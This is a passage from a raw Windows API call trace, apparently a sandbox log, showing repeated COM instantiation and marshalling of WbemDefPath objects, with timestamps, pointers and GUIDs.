[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5accd0) returned 0x0 [0178.081] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5accd0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.081] WbemDefPath:IUnknown:Release (This=0x5accd0) returned 0x3 [0178.081] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0178.081] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0178.081] WbemDefPath:IUnknown:QueryInterface (in: This=0x594200, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0178.081] WbemDefPath:IUnknown:Release (This=0x594200) returned 0x2 [0178.081] WbemDefPath:IUnknown:Release (This=0x594200) returned 0x1 [0178.081] SetEvent (hEvent=0x43c) returned 1 [0178.204] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596db8) returned 0x0 [0178.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x596db8, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0178.205] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596db8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x5944a0) returned 0x0 [0178.205] WbemDefPath:IUnknown:Release (This=0x596db8) returned 0x0 [0178.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x5944a0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x5944a0) returned 0x0 [0178.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x5944a0, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0178.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x5944a0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0178.206] WbemDefPath:IUnknown:AddRef (This=0x5944a0) returned 0x3 [0178.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x5944a0, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0178.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x5944a0, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0178.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x5944a0, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5acd18) returned 0x0 [0178.206] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5acd18, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.206] WbemDefPath:IUnknown:Release (This=0x5acd18) returned 0x3 [0178.206] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0178.206] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0178.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x5944a0, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0178.206] WbemDefPath:IUnknown:Release (This=0x5944a0) returned 0x2 [0178.206] WbemDefPath:IUnknown:Release (This=0x5944a0) returned 0x1 [0178.206] SetEvent (hEvent=0x454) returned 1 [0178.775] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596e18) returned 0x0 [0178.775] WbemDefPath:IUnknown:QueryInterface (in: This=0x596e18, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0178.775] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596e18, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x5942e0) returned 0x0 [0178.775] WbemDefPath:IUnknown:Release (This=0x596e18) returned 0x0 [0178.775] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x5942e0) returned 0x0 [0178.775] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0178.775] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0178.775] WbemDefPath:IUnknown:AddRef (This=0x5942e0) returned 0x3 [0178.775] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0178.776] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0178.776] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5acee0) returned 0x0 [0178.776] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5acee0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.776] WbemDefPath:IUnknown:Release (This=0x5acee0) returned 0x3 [0178.776] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0178.776] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0178.776] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0178.776] WbemDefPath:IUnknown:Release (This=0x5942e0) returned 0x2 [0178.776] WbemDefPath:IUnknown:Release (This=0x5942e0) returned 0x1 [0178.776] SetEvent (hEvent=0x458) returned 1 [0178.815] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596e78) returned 0x0 [0178.816] WbemDefPath:IUnknown:QueryInterface (in: This=0x596e78, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0178.816] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596e78, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x5945f0) returned 0x0 [0178.816] WbemDefPath:IUnknown:Release (This=0x596e78) returned 0x0 [0178.816] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x5945f0) returned 0x0 [0178.816] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0178.816] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0178.816] WbemDefPath:IUnknown:AddRef (This=0x5945f0) returned 0x3 [0178.816] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0178.816] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0178.816] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x59af70) returned 0x0 [0178.816] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x59af70, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.816] WbemDefPath:IUnknown:Release (This=0x59af70) returned 0x3 [0178.816] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0178.816] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0178.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0178.817] WbemDefPath:IUnknown:Release (This=0x5945f0) returned 0x2 [0178.817] WbemDefPath:IUnknown:Release (This=0x5945f0) returned 0x1 [0178.817] SetEvent (hEvent=0x45c) returned 1 [0178.821] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596f08) returned 0x0 [0178.822] WbemDefPath:IUnknown:QueryInterface (in: This=0x596f08, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0178.822] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596f08, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x5946d0) returned 0x0 [0178.822] WbemDefPath:IUnknown:Release (This=0x596f08) returned 0x0 [0178.822] WbemDefPath:IUnknown:QueryInterface (in: This=0x5946d0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x5946d0) returned 0x0 [0178.822] WbemDefPath:IUnknown:QueryInterface (in: This=0x5946d0, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0178.822] WbemDefPath:IUnknown:QueryInterface (in: This=0x5946d0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0178.823] WbemDefPath:IUnknown:AddRef (This=0x5946d0) returned 0x3 [0178.823] WbemDefPath:IUnknown:QueryInterface (in: This=0x5946d0, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0178.823] WbemDefPath:IUnknown:QueryInterface (in: This=0x5946d0, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0178.823] WbemDefPath:IUnknown:QueryInterface (in: This=0x5946d0, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5b1930) returned 0x0 [0178.823] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5b1930, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.823] WbemDefPath:IUnknown:Release (This=0x5b1930) returned 0x3 [0178.823] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0178.823] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0178.823] WbemDefPath:IUnknown:QueryInterface (in: This=0x5946d0, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0178.823] WbemDefPath:IUnknown:Release (This=0x5946d0) returned 0x2 [0178.823] WbemDefPath:IUnknown:Release (This=0x5946d0) returned 0x1 [0178.823] SetEvent (hEvent=0x464) returned 1 [0178.830] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596f48) returned 0x0 [0178.830] WbemDefPath:IUnknown:QueryInterface (in: This=0x596f48, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0178.830] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596f48, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594740) returned 0x0 [0178.831] WbemDefPath:IUnknown:Release (This=0x596f48) returned 0x0 [0178.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x594740, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594740) returned 0x0 [0178.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x594740, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0178.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x594740, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0178.831] WbemDefPath:IUnknown:AddRef (This=0x594740) returned 0x3 [0178.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x594740, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0178.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x594740, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0178.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x594740, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5b17b0) returned 0x0 [0178.831] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5b17b0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.831] WbemDefPath:IUnknown:Release (This=0x5b17b0) returned 0x3 [0178.831] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0178.831] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0178.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x594740, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0178.831] WbemDefPath:IUnknown:Release (This=0x594740) returned 0x2 [0178.831] WbemDefPath:IUnknown:Release (This=0x594740) returned 0x1 [0178.831] SetEvent (hEvent=0x468) returned 1 [0178.836] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596fc8) returned 0x0 [0178.836] WbemDefPath:IUnknown:QueryInterface (in: This=0x596fc8, riid=0x694d79fc*(Data1=0xb196b28f, 